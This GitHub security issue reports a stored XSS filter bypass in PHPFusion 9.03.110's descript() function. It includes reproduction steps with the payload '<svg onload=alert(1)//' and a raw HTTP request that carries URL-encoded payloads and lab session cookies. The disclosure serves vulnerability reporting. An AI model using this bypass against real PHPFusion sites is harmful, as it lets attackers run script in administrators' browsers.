Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Bypass preg pattern lead to Cross-site Scripting in descript() function #2373

Closed
KietNA-HPT opened this issue Aug 25, 2021 · 3 comments
Closed
Assignees
Labels
Security All security fixes or optimization

Comments

@KietNA-HPT
Copy link

KietNA-HPT commented Aug 25, 2021

#KietNA From Inv1cta Team, HPT Cyber Security Center

Sorry for bad english
Describe the bug

preg patterns filter html tag without "//" in descript() function, the authenticated user can trigger xss by append "//" in the end of text
Version

PHPFusion version: PHPFusion 9.03.110

To Reproduce

Steps to reproduce the behavior:

  1. Go to any textarea form
  2. Add "<svg onload=alert(1)//" in textarea form and submit
  3. When authenticated user or admin use preview html function the malicious script will be executed, even the attacker can store malicious script when admin publish submission

Screenshots

preg pattern filter html tag without "//" in the end of html
image

User preview and submit submission
image

Admin preview submission of user
image

Admin publish submission and the attacker can store malicious script
image

The Attacker can store malicious script in forum without admin browsing the post by post new thread function
image
When admin click on Activity button, the script of user kietna will be executed
image

Additional context

###REQUEST:

POST /submit.php?stype=a HTTP/1.1
Host: 172.16.0.12:5554
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 395
Origin: http://172.16.0.12:5554
Connection: close
Referer: http://172.16.0.12:5554/submit.php?stype=a
Cookie: PHPSESSID=qhclrgdoah7rbv9l34fvj07h00; fusiony1dli_session=jjfp12qmql4s64caf8ob6eld2t; fusiony1dli_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0; fusiony1dli_user=1.1630015266.b9cf1c8d19231964f87b60503eb37b6cd23047438f61fe3b750f0d371a242ec6; fusiony1dli_admin=1.1630015307.2c32968c83f8c4c0224d5a0d4a0de496d62b98325c2754a38c3451087161671e; fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; fusionc4q8w_visited=yes; fusionc4q8w_lastvisit=1629852584; fusionc4q8w_user=2.1630031855.2d2e26d63d89a73447202a9978b3ff81a084dae1acbddeeb4c6fd5de86f85469
Upgrade-Insecure-Requests: 1

fusion_token=2-1629861818-8b90d545094236c6cc3daa34012b16531afc70a7d12df00e8dba976f92f37e84&form_id=submissionform&fusion_wKs75X=&article_subject=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&article_keywords=&article_cat=1&article_language%5B%5D=English&article_snippet=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&article_article=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&preview_article=Preview

###RESPONSE:

HTTP/1.1 200 OK
Date: Wed, 25 Aug 2021 03:25:24 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHPFusion 9.03.110
Last-Modified: Wed, 25 Aug 2021 03:25:25 GMT
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68868
@KietNA-HPT KietNA-HPT changed the title Cross-site Scripting bypass in descript() function Bypass preg pattern lead to Cross-site Scripting in descript() function Aug 25, 2021
@KietNA-HPT
Copy link
Author

Hi @RobiNN1 @FrederickChan,
Please preview this issue ^^ ! thanks very much

@FrederickChan FrederickChan self-assigned this Aug 26, 2021
@FrederickChan FrederickChan added the Security All security fixes or optimization label Aug 26, 2021
@KietNA-HPT
Copy link
Author

Hi @FrederickChan!
Sorry to trouble you, but can you request a CVE for me?
Thank you very much!

@RobiNN1
Copy link
Contributor

RobiNN1 commented Sep 1, 2021

You have to request CVE yourself if you want. This is not our job..

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Security All security fixes or optimization
Projects
None yet
Development

No branches or pull requests

3 participants